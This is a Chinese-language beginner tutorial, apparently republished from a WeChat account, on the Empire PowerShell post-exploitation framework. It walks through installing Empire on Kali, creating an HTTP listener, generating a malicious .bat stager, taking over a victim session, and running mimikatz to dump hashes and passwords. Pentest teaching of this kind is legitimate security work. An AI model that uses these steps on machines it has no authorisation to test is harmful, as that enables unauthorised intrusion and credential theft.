Empire框架入门到放弃(一)

admin 2022年11月9日21:39:22安全文章评论15 views1024字阅读3分24秒阅读模式

Empire是针对Windows平台的,使用PowerShell脚本作为攻击载荷的渗透测试攻击框架,具有stager生成提权、权限维持的功能。Empire无需powershell.exe就能运行power shell代理的功能,有许多后期漏洞利用模块。类似于msf

⚽在kali中安装

在kali中安装很简单,我们只需执行下面命令即可。

sudo apt install powershell-empire
Empire框架入门到放弃(一)

🎨启动服务端

这个和我们之前讲过的cs一样。有客户端和服务端。我们先来启动Empire powershell服务端

powershell-empire server
Empire框架入门到放弃(一)

🎳启动Empire powershell 客户端

powershell-empire client
Empire框架入门到放弃(一)

📢牛刀小试

Empire的使用方法与msf的方法相同,先设置监听,生成木马,然后监听反弹代理。输入Listeners进入监听页面,uselistener设置监听模式,共有7种模式

  • dbx
  • http
  • http_foreign
  • http_hop
  • http_mapi
  • http_com
  • meterpreter

这里,我们以http模块为例:

uselistener http #监听方式为http
set Port 4321 #设置端口
execute #运行

Empire框架入门到放弃(一)现在配置完监听模块,我们来看看怎样生成shell. 使用windows/launcher_bat模块,来生成恶意shell。

usestager windows/launcher_bat
set Listener http #设置监听方式
execute #运行

执行完成上面的命令后,我们的恶意文件已经生成。格式为batEmpire框架入门到放弃(一)

Empire框架入门到放弃(一)

双击运行后,我们可以看到已经成功得到了会话。输入agents可以查看连接上的计算机的详细信息。

Empire框架入门到放弃(一)

🧩连接设备

和msf一样,我们需要连接当前在线的设备。interact 设备name

interact V1T86EUN

Empire框架入门到放弃(一)

运行help命令,可以看到具体的帮助文档。Empire框架入门到放弃(一)由于命令比较多,这里我列举常用的一些命令

进入系统cmd

shell
Empire框架入门到放弃(一)

使用内置的mimikatz抓取hash和密码

mimikatz

设备详细信息

info
Empire框架入门到放弃(一)
可以看到 列出的信息还是比较全面的

🎯总结

empire模块和msf一样,功能很强大。配置相比msf略有不同。后期的文章中,我们还会重点更新!喜欢的小伙伴们欢迎点赞收藏!

更多精彩文章 欢迎关注我们


原文始发于微信公众号(kali黑客笔记):Empire框架入门到放弃(一)

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年11月9日21:39:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  Empire框架入门到放弃(一) http://cn-sec.com/archives/1392917.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: